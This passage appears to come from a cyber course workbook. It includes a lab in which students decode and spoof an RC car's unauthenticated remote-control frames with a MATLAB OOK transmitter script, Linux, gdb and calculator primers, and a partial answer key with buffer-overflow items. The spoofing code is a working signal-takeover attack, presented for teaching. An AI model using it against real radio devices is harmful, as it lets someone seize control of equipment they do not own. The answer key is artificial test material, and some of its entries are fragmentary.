1’s in the trail following the sync pulses. For example, the image below represents
01110111011101110101010101010101010101110 in binary (check back to HW23 if you’re not a believer yet –
you knew this way back when!). This sequence of bits is organized as follows.
On the oscilloscope, the control signal will be displayed as seen in the next figure.
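A decoder for this frame layout, as an added example (Python, not the lab's RCcode.m): it assumes the frame format that RCcode.m generates (four 1110 sync pulses followed by a trail of "10" pairs, so the command is the count of trailing 1s), walks a captured bit stream, and reports that count for every complete frame. The sample stream is the bit pattern quoted above; the command letters in the lookup table are placeholders for the directions you match yourself in Question 17.

```python
"""Decoder for the RC car control frame used in Security Exercise 26.

Added example (Python, not the MATLAB RCcode.m from the lab). Assumed frame
layout, taken from what RCcode.m builds: SYNC = "1110" * 4, then "10"
repeated N times, so the command is identified by N, the number of 1s in
the trail. The capture below is the bit pattern quoted in the notes.
"""

SYNC = "1110" * 4  # four wide sync pulses, as in RCcode.m


def build_frame(ones_in_trail):
    """Mirror of RCcode.m's [sync repmat([1 0], 1, N)] as a bit string."""
    return SYNC + "10" * ones_in_trail


def decode_frames(bits):
    """Return the number of trailing 1s for every complete frame in a bit stream.

    Idle bits before the first sync and a partial sync of the next frame at
    the end are skipped; a frame is only reported once its full header was seen.
    """
    if set(bits) - {"0", "1"}:
        raise ValueError("bit stream must contain only '0' and '1'")
    counts = []
    pos = bits.find(SYNC)
    while pos != -1:
        pos += len(SYNC)
        ones = 0
        while bits.startswith("10", pos):  # trail is strictly "10" pairs
            ones += 1
            pos += 2
        counts.append(ones)
        pos = bits.find(SYNC, pos)  # next frame, if its header is complete
    return counts


def classify(bits, command_table):
    """Map decoded trail counts to names via a caller-supplied table.

    Unknown counts are reported as '?' rather than guessed: a count that is
    off by one usually means the capture was misread, not a new command.
    """
    return [command_table.get(n, "?") for n in decode_frames(bits)]


# Bit pattern quoted in the notes for the scope capture: one idle bit, the
# sync header, ten "10" pairs, then the first pulse of the following frame.
NOTES_CAPTURE = "01110111011101110101010101010101010101110"

# Placeholder table (assumption): the letters stand in for the directions
# you match in Question 17; the counts are the ones listed on the worksheet.
EXAMPLE_TABLE = {10: "command A", 40: "command B", 34: "command C", 28: "command D"}

# Nothing in a frame identifies or authenticates the sender; whoever
# reproduces the right count is obeyed, which is what Part IV relies on.

if __name__ == "__main__":
    print(decode_frames(NOTES_CAPTURE))  # [10]
    stream = "".join(build_frame(n) for n in (40, 34, 28))
    print(classify(stream, EXAMPLE_TABLE))
```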
Question 19: Fill in the table by entering the number of 1’s trailing the sync pulses for each RC car operation
determined in Question 18. You must find the exact value!
Direction     Number of 1’s in trail
Forward       __________
Reverse       __________
Right         N/A
Left          N/A
Fwd-Right     __________
Fwd-Left      __________
Rev-Right     N/A
Rev-Left      N/A
The MATLAB code takes input from the arrow keys on your laptop, generates the baseband binary signals to control the RC
vehicle, then modulates the signal with OOK. Since we only determined the binary waveform for 4 of the 8 possible
operations, we’ll be slightly limited in the operation of our RC vehicle – we won’t be able to turn while operating in reverse.
□
In MATLAB, update the “Setup Major Variables” section of your RCcode.m code (shown below) with the number
of 1s in the “trail” in preparation of taking over the RC vehicle.
%%%%%%%%%%%%%%%%
% RC CAR CODE %
%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% PRESS SPACE TO TERMINATE EXECUTION
%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% !!!!! NOTE !!!!!
% If you do something wrong and Matlab terminates unexpectedly (you get a
% lot of angry red Error messages) you will have to close out and restart
% Matlab in order to clear out the sound card buffer!!!
%
% Forward = Up Arrow
% Reverse = Down Arrow
% Forward Right = Right Arrow
% Forward Left = Left Arrow
%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% Clear out memory and initialize default settings
%
% DO NOT CHANGE THIS SECTION
%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
clear all
close all
set(0, 'DefaultAxesFontSize', 14)
set(0, 'DefaultAxesFontWeight','Bold')

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% Setup major variables
%
% CHANGE THIS SECTION ONLY!!! (FOLLOW LAB INSTRUCTIONS) %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% Insert Number of 1's from Question 20 table here!
forward_1s   = 01;
reverse_1s   = 01;
right_fwd_1s = 01;
left_fwd_1s  = 01;
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
sam_per_sym = 22;       % fs/Rb = 44.1e3/(1/Tb), Tb ~ 500us
fs = 44.1e3;            % Set sampling rate to sound card rate
Rb = fs./sam_per_sym;
fif = 10e3;             % 10.0 kHz "baseband" (IF) Frequency
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% Generate the original data to manipulate the car
%
% DO NOT CHANGE THIS SECTION
%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
sync = [1 1 1 0 1 1 1 0 1 1 1 0 1 1 1 0];      % four wide sync pulses
forward   = [sync repmat([1 0], 1, forward_1s)];
reverse   = [sync repmat([1 0], 1, reverse_1s)];
right_fwd = [sync repmat([1 0], 1, right_fwd_1s)];
left_fwd  = [sync repmat([1 0], 1, left_fwd_1s)];
pause = zeros(1,500);   % silence when no arrow key is held (shadows MATLAB's pause function)
key = 0;                % Initial Keyboard Value

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% Reads inputs once per second
%
% DO NOT CHANGE THIS SECTION
%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
while key ~= 32         % Press space to stop
    key = getkey(1);
    if key == 30
        data = [forward forward forward forward forward forward forward forward];
    elseif key == 31
        data = [reverse reverse reverse reverse reverse reverse reverse reverse];
    elseif key == 29
        data = [right_fwd right_fwd right_fwd right_fwd right_fwd right_fwd right_fwd right_fwd];
    elseif key == 28
        data = [left_fwd left_fwd left_fwd left_fwd left_fwd left_fwd left_fwd left_fwd];
    else
        data = [pause];
    end

    % Generate Polar NRZ
    time_stop = length(data).*sam_per_sym;
    up_data = zeros(1,time_stop);
    time = linspace(0,(1/fs).*time_stop, length(up_data));
    % Upsample: hold each bit for sam_per_sym samples
    for i = 0:length(data)-1
        up_data(sam_per_sym.*i + 1 : sam_per_sym.*i + sam_per_sym) = data(i+1);
    end

    % Generate the "baseband" (IF) waveform (OOK: carrier on for a 1, off for a 0)
    s_lo = cos(2.*pi.*fif.*time);
    s_if = s_lo.*up_data;
    soundsc(s_if,fs)
end
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
When your code is updated, run it by pressing the run button. Follow the next instruction carefully!
Double click your cursor in the MATLAB Command Window. If all went as planned you should see a window
opening and closing rapidly.
Press and hold your arrow keys to simulate driving your vehicle.
Question 20: What do you hear? What type of signal is being generated?
Question 21: What do you need to do to transmit this baseband binary signal so that the car receives it? Get your
instructor’s signature to continue.
Your instructor will use the same signal generator that transmitted the jamming signal in Part II to transmit the modulated
ASK signal. The set up looks like this:
Bring your laptop to your instructor and get ready to drive!
Question 22: Do you need the car’s transmitter to control the car? What just happened? What is now controlling the
car?
Question 23: List some examples of how this might be significant in a military setting.
Need ideas? Check this out! http://www.engr.utexas.edu/features/humphreysspoofing.
Appendices
Basic Linux Commands
I. Basic Linux Commands
The information below presumes you are familiar with the Linux file system and that you understand how
to refer to files and directories using absolute and relative pathnames. You should also be familiar with
the commands cd (change directory) and ls (list). This prerequisite information is available in the
handout named The Linux File System available as a link under the Resources tab on the EC310 course
website.
We will now address some basic file and directory operations.
To copy a file from one location to another, we use the cp command. For example, in the file system
below, if dane was in his home directory and wanted to give bob a copy of the file named homework4, placing
it directly in bob's home directory, he would type

cp Cyber/homework4 ../bob

where Cyber/homework4 is the item to be copied and ../bob is where the copy is to be placed.
To create a file from scratch, you can open the file using nano, as you’ve done for all the programs
you’ve entered in EC310.
To move a file, we use the mv command. In the file system shown above, if user dane wanted
to move the file named spoofing to place it under the Cyber directory, he would enter

mv spoofing Cyber
To view a file, we use the command cat followed by the filename (if it is right in your working directory)
or cat followed by the absolute or relative pathnames (if the file is not right in your working directory).
To remove a file, use the command rm followed by the file name (or pathname as applicable).
We can, in like manner, create a new directory using mkdir followed by the directory name (if we want
to place the directory right under the working directory) or mkdir followed by the pathname where we
want to place the new directory.
Finally, we can delete directories by using the command rmdir followed by the directory name or
pathname as appropriate. Note that you can only remove an empty directory, so to delete a directory you
must first delete all of its contents.
You should realize that we have only scratched the surface of using the Linux bash shell. You should not
place "Linux System Programmer" on your resume. But what you have learned, along with your use of
the gcc compiler, the gdb debugger and permission management (covered in Lessons 8 and 9) is more
than enough for EC310.
The Linux File System
I. The Linux File System
1. Introduction All users of a Linux OS have an account name (also referred to as a user name or a
login name) and a password. When your Linux account is created, you are also given a home directory
where all of your files and folders will reside. Your home directory has the same name as your account
name.
You may be wondering: Hey, I’m using Linux in EC310 and I was never asked for an account name and
password while logging on? That is because your textbook author (Jon Erickson) has set up your VMware
software to provide Linux “already open” for you. We have, however, changed your account name to
midshipman since that is, after all, your first name.
You have been entering commands using the bash shell as your command line interface. Every time you
have entered a command such as
gcc -g smith_2_1.c
or
nano smith_2_1.c
you have entered that command at the bash shell’s prompt. The bash shell’s prompt for ordinary users is
the dollar sign. Before the prompt, you will see your account name and your computer's name.
[picture of the prompt, with your account name, your computer's name and the prompt ($) labelled]
There is one additional item in the picture above that you may have noticed: the tilde symbol (~). The
tilde is an abbreviation for your home directory. When you log in, you are placed by default in your home
directory.
If you wander up to a computer and notice that someone is logged on, and you see
then the user whose account name is joe has logged in but has forgotten to log out. Shame on him. Too
bad.
If you ever forget who you are, even though your account name is staring you in the face, you can enter:
whoami
as shown below:
In Linux, just as with Windows, there are files. And in Linux, just as with Windows, there are directories
(in Windows terminology, these are referred to as folders), which hold files (or other directories).
A Linux system (like a Windows system) may support multiple users. In such cases, each user is given
his own home directory. When you logon, you are automatically placed in your home directory. When
Joe logs on, he is automatically placed in his home directory. Your home directory is the natural location
for any directories or files that you create. You can leave your home directory and move to other
directories. Whatever directory you find yourself in, that directory is termed your working directory.
A typical Linux file system (also called a directory structure) might look like this:
At the very top is the root directory, denoted /. The root directory contains all directories and files.
2. Absolute Pathnames Every file can be referenced by its absolute pathname, which starts at the root
directory and traipses down the inverted tree structure, with each entry also separated by a forward slash.
For example, the absolute pathname for the directory joe is
/home/joe
Note that in an absolute pathnames, the slash (/) character has two different meanings. The first slash
always refers to the root directory. Any other slashes that may be present simply serve as separators.
Since absolute pathnames can be long, a few shortcuts are provided:
• To specify a directory or file in your current directory, you can use just the name of the directory
  or file.
• A tilde serves as an abbreviation for your own home directory.
• A tilde followed by another user's name serves as an abbreviation for that other user's home
  directory.
In the Linux command line, preceding the prompt, you are also provided with an indication of your current
working directory. If you are in your home directory (which, as an absolute path name for our classwork
in EC310, might be something like /home/midshipman ), this will appear as just a tilde since, recall,
a tilde serves as an abbreviation for your own home directory.
3. Relative Pathnames Whereas absolute pathnames always start from the root, relative pathnames
start from your current location (i.e., your working directory). The notation relies on the use of two dots
(..) to serve as an abbreviation for the immediate parent of the current directory.
As an example, in the picture above, if your working directory is dane, the relative pathname of the home
directory is simply: .. On the other hand, if your working directory is bob, the relative pathname of the
directory Hacking would be ../dane/Hacking . In other words, to get from bob to Hacking,
you first must go up one directory to home (the parent directory, represented by the two dots), then from
home you go down one directory to dane, and then down to Hacking.
Another shortcut is also available for use in relative pathnames. A single dot (.) can be used as a shorthand
notation for your current working directory.
4. Listing Files You can list the contents of the working directory by using the ls command. For
example, if, in the picture above, your working directory was dane, then the command ls would yield
the results:
Hacking
Cyber
spoofing
You can list the files in a different directory by typing ls followed by the absolute or relative pathname
of the directory you are seeking information about. For example, if your working directory was dane
and you entered ls ../bob , the result would be:
Acme
Ramshead
5. Changing Your Working Directory To change your working directory to another directory, simply
enter the command cd followed by the directory you wish to change to. For example, if your working
directory was dane, you could change your working directory to bob by entering
cd ../bob
When you change your working directory, the command line will update to indicate your new working
directory. For example, if I am the user named midshipman and I change my directory to a subdirectory named work, I will see as my new prompt:
Working directory changed to ~/work
If you find yourself lost in the file system, you can instantly reset your working directory back to your
home directory by simply typing cd by itself. You may have already noticed that we have changed our
working directory at the start of most security exercises by typing:
cd booksrc
6. The root User Every Linux system has a special user named root. The root user is the great-and-all-powerful
system administrator of the Linux system. The root user can access any file on the system,
including the files of individual users. The root user can read the files of all users, can write over any
files, and can delete any files. The root user can load any software onto the system (e.g., programs). The
root user owns the system.
The dream of all hackers is to somehow become the root user. In Linux, the root user has a special prompt,
the pound sign (#). If you walk up to a computer and see this:
that means the root user has logged in and left the computer unattended. That would be bad.
Brief Primer on gdb
Getting started. Assume our C program is named test.c. The program is shown below.
#include<stdio.h>
int main( )
{
int a = 2;
int b = 1000;
char x = '$' ;
char phrase[4] = "Fun" ;
printf( "Yes");
printf("No");
}
To run the debugger on the compiled version of test.c, always start by entering:
gcc -g test.c
gdb -q ./a.out
set dis intel
list
If your source code is more than 10 lines, you may have to hit enter again, to list the next 10 lines. We
see this:
midshipman@EC310-VM:~ $ gcc -g test.c
midshipman@EC310-VM:~ $ gdb -q ./a.out
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) set dis intel
(gdb) list
1    #include<stdio.h>
2    int main( )
3    {
4    int a = 2;
5    int b = 1000;
6
7    char x = '$' ;
8
9    char phrase[4] = "Fun" ;
10
(gdb)
11   printf( "Yes");
12
13   printf("No");
14   }
(gdb)
The line numbers shown on the left can be very useful for setting breakpoints. For example, if I wanted
to run the program but have it pause right between the two final printf statements, I would enter
break 12
run
(You have already seen us set a breakpoint at main by entering break main… this is the same idea.)
Looking at Memory Based on our program, we should have the following items stored in memory:
2
1000
'$'
"Fun"
The strings "Yes" and "No" are also in memory somewhere, but we'll concentrate just on the integers 2
and 1000, the character '$' and the string "Fun".
If I were to look into memory, I would see this (where all values are hexadecimal):
Looking at this section of memory, it may not be obvious where items are stored. Here is where the
integers 2 and 1000, the character '$' and the string "Fun" are placed:
The string "Fun"
Consulting the handy-dandy ASCII table, we see:

Character    ASCII hexadecimal value
F            46
u            75
n            6e
So, sure enough, there it is at memory location bffff808. You should also note that the NULL
terminator appears as the character immediately following the 'n' in "Fun" .
Looking at the memory on the bottom of the previous page, try to guess what will be displayed by each
of the following commands. (The answers immediately follow.)
(a) x/xb 0xbffff808
(b) x/xh 0xbffff808
(c) x/xw 0xbffff808
(d) x/xs 0xbffff808
Answers:
(a) 46 (displays a byte)
(b) 7546 (displays two bytes)
(c) 006e7546 (displays four bytes)
(d) "Fun" (displays as a string)
For (b) and (c), note the annoying little-endian.
We can specify the number of units we wish to have printed out by placing a number after the slash. For
example, looking at the memory on the bottom of the previous page, try to guess what will be displayed
by each of the following commands. (The answers immediately follow.)
(a) x/xb 0xbffff808
(b) x/2b 0xbffff808
(c) x/3b 0xbffff808
(d) x/4b 0xbffff808
(e) x/2h 0xbffff808
Answers:
(a) 46 (displays a byte)
(b) 0x46 0x75 (displays two bytes)
(c) 0x46 0x75 0x6e (displays three bytes)
(d) 0x46 0x75 0x6e 0x00 (displays four bytes)
(e) 0x7546 0x006e (notice that each half-word is presented in annoying little-endian)
If we suspect that characters are being stored, we can ask that the display be presented as characters by
specifying the c format. Looking at the memory on the bottom of page 584, try to guess what will be
displayed by each of the following commands. (The answers immediately follow.)
(a) x/c 0xbffff808
(b) x/2c 0xbffff808
(c) x/3c 0xbffff808
(d) x/4c 0xbffff808
Answers:
(a) 70 'F'
(b) 70 'F' 117 'u'
(c) 70 'F' 117 'u' 110 'n'
(d) 70 'F' 117 'u' 110 'n' 0 '\000'
Suppose we thought an integer was stored at address 0xbffff808. We could check this by entering
x/dw 0xbffff808
If we do this, we see:
0xbffff808: 7238982
Can you guess where on Earth this value 7238982 comes from?
Answer:
We saw earlier that entering x/xw gave us 006e7546. If we convert the hexadecimal value
006e7546 to a decimal integer, we find its value is 7238982.
The character $
Looking at the bottom of page 584, we see the $ character is stored at location bffff80f.
Looking at the memory on the bottom of page 584, try to guess what will be displayed by each of the
following commands. (The answers immediately follow.)
(a) x/xb 0xbffff80f
(b) x/c 0xbffff80f
(c) x/db 0xbffff80f
(d) x/s 0xbffff80f
Answers:
(a) 0x24
(b) 36 '$'
(c) 36
(d) "$\350\003"
Note that 0x24 equals 36 in decimal, and that the last item is gibberish because a string is not stored in this
location.
The integer 1000
So, first, we should convert the decimal value of 1000 to hexadecimal. If we do this, we find it is equal
to 0x3e8.
With reference to the bottom of page 584, answer the following questions.
(a) Why is 1000 stored in four bytes if it only needs two bytes?
(b) Presuming this value does take four bytes, and thus is equal to 0x000003e8, why is it not stored
with the leading two zeros at the "top" memory locations?
Answers:
(a) All integers are stored in four bytes, even if fewer are needed.
(b) Little endian, little endian, little endian.
Looking at the memory on the bottom of page 584, try to guess what will be displayed by each of the
following commands. (The answers immediately follow.)
(a) x/xb 0xbffff810
(b) x/xh 0xbffff810
(c) x/d 0xbffff810
(d) x/2c 0xbffff810
Answers:
(a) 0xe8
(b) 0x03e8
(c) 1000
(d) gibberish
So… do you think you get it? To see, try this:
Your friend types x/d 0xbffff813 and sees that the result is 512. Explain!
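To make the little-endian bookkeeping behind these questions concrete, here is an added Python example (not part of the course notes) that emulates gdb's x command over a constructed memory image laid out like test.c: "Fun" at 0xbffff808, '$' at 0xbffff80f and 1000 at 0xbffff810 are taken from the answers above, the byte 0x02 at 0xbffff814 is what the 512 puzzle implies (the integer a = 2), and the three bytes at 0xbffff80c are assumed to be zero.

```python
import re

# Constructed memory image (an added example, not from the notes) covering
# 0xbffff808..0xbffff817. Bytes at 0xbffff80c..0xbffff80e are not on the page
# and are assumed to be zero.
MEM_BASE = 0xbffff808
MEM = bytes([
    0x46, 0x75, 0x6e, 0x00,  # 0xbffff808: char phrase[4] = "Fun" plus its NUL terminator
    0x00, 0x00, 0x00,        # 0xbffff80c: padding (assumed)
    0x24,                    # 0xbffff80f: char x = '$'
    0xe8, 0x03, 0x00, 0x00,  # 0xbffff810: int b = 1000 = 0x000003e8, little-endian
    0x02, 0x00, 0x00, 0x00,  # 0xbffff814: int a = 2 (implied by x/d 0xbffff813 == 512)
])

UNIT_BYTES = {'b': 1, 'h': 2, 'w': 4, 'g': 8}


def read(addr, size):
    """Return `size` raw bytes at `addr`, refusing to read outside the image."""
    off = addr - MEM_BASE
    if off < 0 or off + size > len(MEM):
        raise ValueError("0x%x is outside the constructed image" % addr)
    return MEM[off:off + size]


def char_repr(b):
    """Render one byte as gdb's 'c' format does: 'F' if printable, else octal like '\\350'."""
    return "'%c'" % b if 32 <= b < 127 else "'\\%03o'" % b


def c_string(addr):
    """Read a NUL-terminated string at `addr` as gdb's 's' format does.

    Returns the quoted string (non-printable bytes shown as octal escapes)
    and the address just past the terminator.
    """
    raw = bytearray()
    while read(addr, 1) != b'\x00':
        raw += read(addr, 1)
        addr += 1
    text = ''.join(chr(b) if 32 <= b < 127 else '\\%03o' % b for b in raw)
    return '"%s"' % text, addr + 1


def examine(cmd, addr):
    """Emulate gdb's x/<count><fmt><unit> on the image and return the printed units.

    Defaults follow gdb: count 1, hex format ('x'), word unit ('w').
    The 'c' format always uses 1-byte units; 's' reads NUL-terminated strings.
    """
    m = re.fullmatch(r'x/(\d*)([xducsbhwg]*)', cmd)
    if not m:
        raise ValueError("unsupported command: " + cmd)
    count = int(m.group(1) or '1')
    fmt, unit = 'x', 'w'
    for ch in m.group(2):  # format and unit letters may appear in either order
        if ch in UNIT_BYTES:
            unit = ch
        else:
            fmt = ch
    if fmt == 's':
        out = []
        for _ in range(count):
            text, addr = c_string(addr)
            out.append(text)
        return out
    size = 1 if fmt == 'c' else UNIT_BYTES[unit]
    out = []
    for i in range(count):
        raw = read(addr + i * size, size)
        # x86 is little-endian: the lowest address holds the least significant
        # byte, which is why x/xh at 0xbffff808 shows 0x7546 rather than 0x4675.
        value = int.from_bytes(raw, 'little', signed=fmt in ('d', 'c'))
        if fmt == 'x':
            out.append('0x%0*x' % (2 * size, value))
        elif fmt in ('d', 'u'):
            out.append(str(value))
        else:  # 'c'
            out.append('%d %s' % (value, char_repr(raw[0])))
    return out


if __name__ == "__main__":
    for cmd, addr in [('x/xw', 0xbffff808), ('x/dw', 0xbffff808), ('x/s', 0xbffff808),
                      ('x/s', 0xbffff80f), ('x/d', 0xbffff810), ('x/d', 0xbffff813)]:
        print('(gdb) %s 0x%x' % (cmd, addr))
        print('0x%x:\t%s' % (addr, '\t'.join(examine(cmd, addr))))
```

The x/d 0xbffff813 case reads the top (zero) byte of 1000 followed by the low three bytes of the next integer, 02 00 00, which little-endian assembles into 0x00000200 = 512.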
Performing Base Conversions on the TI-nSpire CAS Calculator
Performing base conversions on your TI-nSpire calculator is relatively straightforward. Becoming
proficient at using your calculator this way will be useful to you throughout the course, especially as we
begin to perform complex mathematical operations in different number bases.
1. Setup
To begin, ensure that your calculator is set up in the “Auto” calculation mode and the “Decimal”
base system. Your calculator is probably already set up this way, but check it just to be sure.
To check these settings use the following key sequence:
• Press [home]
• Press 5: Settings
• Press 2: Document Settings
Your screen should now look similar to this:
Use the navigation pad to move down to the Calculation Mode setting.
If you get to the Calculation Mode setting and it’s not set to “Auto”, then push the navigation
pad to the right to bring up the menu of Calculation Mode options. Use the navigation pad to
move up or down to select “Auto”, then press the enter key.
Repeat this procedure to ensure the Base is set to decimal.
Once the Calculation Mode and Base are properly set, repeatedly press down on the
navigation pad until OK is highlighted and press the enter key.
If you see the dialog box below, press the enter key to select OK.
2. Conventions
Now that your calculator is set up properly, the following conventions apply:
• Decimal numbers are typed with no special notation (e.g. 2015)
• Hexadecimal numbers are typed by preceding the number with "0h". That's a zero, not letter
  "O" (e.g. 0h3EA)
• Binary numbers are typed by preceding the number with "0b". Again, it's zero, not letter
  "O" (e.g. 0b100101)
3. The Conversion Operator
Conversion among different bases is handled through the use of the “conversion operator”. It’s a
single character that looks like a right-facing sideways triangle: ► To access this character you
need to bring up the symbol palette on your calculator. You do that by pressing and releasing the
ctrl key, followed by pressing and releasing the symbol palette key. The symbol palette
will then pop-up. The keys and the palette are identified in the picture on the next page.
[picture of the calculator, with the ctrl key, the symbol palette key, the conversion operator and the symbol palette labelled]
You select the conversion operator by pressing the enter key. The operator will then show up in
your display.
That seems like a lot of steps for a single character, but it’s not too bad. Once you’ve selected the
operator for the first time, the nSpire calculator remembers that position on the symbol palette.
Hereafter, to select the conversion operator you simply press these three keys one after the other:
ctrl, symbol palette, enter
For the remainder of this document, I'll use ► as shorthand for, "press ctrl, symbol
palette, enter."
4. Performing Conversions
Now we’re ready to put this to good use. Let’s jump right in using some of the examples from the
first lecture. I’ll use this notation, [enter], to mean, “press the enter key”.
Problem: Express the binary number 0b110110 as a decimal number.
Type: 0b110110 [enter]
Solution: 54
Because the calculator is set up to perform Auto Calculations in the Decimal Number System, we
don’t have to use the conversion operator in this example. Simply typing a number in binary (with
the leading “0b”) and pressing enter will tell the nSpire to output the result in decimal. Note, if
you leave off the leading “0b” and type this: 110110 [enter], the nSpire will output 110110.
That’s because the calculator assumes you entered: One hundred ten thousand, one hundred and ten
(the decimal number).
Problem: Convert the decimal number 148 to binary.
Type: 148 ► base2 [enter]
Solution: 0b10010100
Here we learn how to tell the nSpire that we want to convert to some other base besides decimal by
typing the characters “base2”. Note, the nSpire will capitalize the “b” in “base2” for you and
redisplay your input as: 148►Base2
Problem: Express the hexadecimal number 0x3CB as a decimal number.
Type: 0h3cb [enter]
Solution: 971
Remember, absent any specified base the nSpire defaults all results to decimal. Also, you will
usually see hexadecimal numbers written with the “0x” prefix in this class. Just remember that the
nSpire expects to see “0h” as the prefix for hexadecimal numbers.
Problem: Convert the decimal number 2576 to hexadecimal.
Type: 2576 ► base16 [enter]
Solution: 0hA10
Problem: Convert the hexadecimal number 0x13F to binary.
Type: 0h13f ► base2 [enter]
Solution: 0b100111111
Problem: Convert the binary number 0b110101001 to hexadecimal.
Type: 0b110101001 ► base16 [enter]
Solution: 0h1A9
Simple calculations are great, but real power comes in more complex calculations. That’s because
you can write statements with calculations on the left side of the conversion operator symbol (►).
Let’s look at an example:
Problem: A section of memory beginning at address 0xD213AC53 contains 438 bytes of data (one
byte of data per address line). The address space looks like this:

Address        Data
0xD213AC53     45
0xD213AC54     88
0xD213AC55     3C
0xD213AC56     E2
…              …
…              …
…              …
What hexadecimal memory address comes next after the end of the 438 bytes of data?
Type: 0hd213ac53 + 438 ► base16 [enter]
Solution: 0hD213AE09
For these examples I used “0x” in the problem statement and “0h” in the calculations on purpose.
Remember, the nSpire needs to see the “0h” prefix to represent hexadecimal numbers, but you’ll
often see it written in problems as “0x”. If you make a mistake and type 0xd213ac53 it will be
obvious because the nSpire will assume you want to multiply zero (0) times xd213ac53 and will
show you the result equals zero (0).
After a little practice you’ll get the hang of it and find that you can perform very complex
calculations in different bases quite easily.
Answers to Selected Problems
Chapter 1
Problem 6:
The hard drive.
Problem 9.
Writing the value of the position below each bit we have
 1  0  0  0  0  0
32 16  8  4  2  1
The only position that has a bit value of 1 is the position corresponding to 32.
Thus 100000₂ = 32₁₀.
Problem 10.
10101₂ = 21₁₀.
Problem 13.
78₁₀ = 1001110₂
Problem 16.
0x27 is equivalent to 39 in base-10.
Problem 18.
0x100 is 100000000 in binary.
Problem 21.
Since the first hexadecimal digit is C, the first four bits are 1100. Thus, the fourth
bit is a zero. Note how more difficult this question would have been if the
address was provided in base-10 instead of in base-16.
Problem 26.
0x8D4.
Problem 29.
16 into 730 gives a quotient of 45 with a remainder of A
16 into 45 gives a quotient of 2 with a remainder of D
16 into 2 gives a quotient of 0 with a remainder of 2
Thus, 730₁₀ = 0x2DA. Since we are asked to use the number of hex digits
appropriate for the x86 architecture, we must use 8 hex digits. Thus, the final
answer is 0x000002DA
Chapter 2
Problem 2.
#include <stdio.h>
int main( )
{
float tempF, tempC;
printf("Please enter your Fahrenheit temperature: ");
scanf("%f", &tempF);
tempC = (5.0/9.0)*(tempF - 32.0);
printf("The equivalent Celsius temperature is %f. \n", tempC);
}
Problem 6.
(a) Machine code
(b) High-level code
(c) assembly code
Chapter 3
Problem 1.
Problem 4.
(a) Assembly language
(b) This instruction takes the 4 byte value 0x08048484 and stores it in the memory
location that is stored in the esp register.
Problem 10.
(a)
(b)
2
Howitzer
Torpedoes
Problem 11.
(a)
(b)
(c)
mov DWORD PTR [ebp-4],0x5
ebp-4
=
0xbffff814
0x0804838b
char
(b)
Chapter 4
1.
(a)
string
5.
C doesn’t check/prevent access of an element outside the range of an array.
6.
(a) 20 bytes
(b) 7
(c) The (garbage) value stored in memory immediately below the array would be displayed.
Chapter 5
8.
(e)
9.
My teacher is LCDR Agood day by all!
Chapter 6
3.
(d)
4.
Address:
Data:
What is Represented:
Stack Frame Info:
0xBFFFF810
0xBFFFF811
0xBFFFF812
0xBFFFF813
0xBFFFF814
0xBFFFF815
0xBFFFF816
0xBFFFF817
0xBFFFF818
11
00
00
00
g
esp_main
42
00
fox[0]
fox[1]
ebp_main
Chapter 7
4.
(a) No.
(b) The program is writing more data into the buffer than it can hold—i.e., a buffer overflow.
(c) 10 bytes (9 characters plus the NULL).
(d) Increase the size of the buffer or only copy five characters and stop (strncpy).
5.
(a) 15 Bytes of Array + 4 Bytes of int + 4 bytes of prev_ebp = 23 characters. Note that a
NULL character is automatically appended to the end.
(b) No, because year precedes the start of the buffer as it is declared last. Therefore if you
write past the end of the buffer you will overwrite name_len, not year.
Chapter 8
5.
Answer is (a).
Chapter 9
5.
(a) atwood
(b) read, execute
(c) chmod o+x gethappy.exe followed by chmod o+r gethappy.exe (or,
alternatively: chmod o=rx gethappy.exe).
6.
(a) setuid (set user id)
(b) When the user executes the file, they execute the file as the owner of the file.
Chapter 11
7.
Application    __d__
Transport      __b__
Network        __e__
Data Link      __a__
Physical       __c__
Chapter 12
8.
(a) 10 Mbps / 6 hosts equals approximately 1.67 Mbps per host
(b) 10 Mbps / 4 hosts = 2.5 Mbps per host
(c) 10 Mbps / 2 Hosts = 5 Mbps per host
Chapter 13
5
Answer is (a)
6
(b)
83 78 a8 1f = 131.120.168.31
7
(a) 255.255.224.0
(b) 136.52.96.0
(c) 136.52.127.255
(d) 8192
8.
Every packet is an independent entity, possibly traveling over different paths from source to
destination.
10.
146.25.128.0
13.
32 ; 8 ; 0 ; 255
14.
To extract the network ID from an IP address (or to extract the network address).
15.
(a) 2^5 – 2 = 30
(b) 137.18.129.10000001 = 137.18.129.129
(c) 137.18.129.10011110 = 137.18.129.158
(d) 137.18.129.10011111 = 137.18.129.159
19.
(a) True
(b) True
(c) False
(d) False
20.
The valid ones are (b), (d) and (e)
21.
(a) 128.32.14.0
(b) 9
(c) 510
(d) 128.32.15.254
Chapter 15
5.
(a) Distance vector
(b) Link state
6.
Destination    Next element    Total cost
A              A               5
B              I               3
C                              0
D              I               2
E              E               5
Chapter 16
6.
The assumption is that each router can trust the information that other routers are sending it.
7.
(a)-(c):
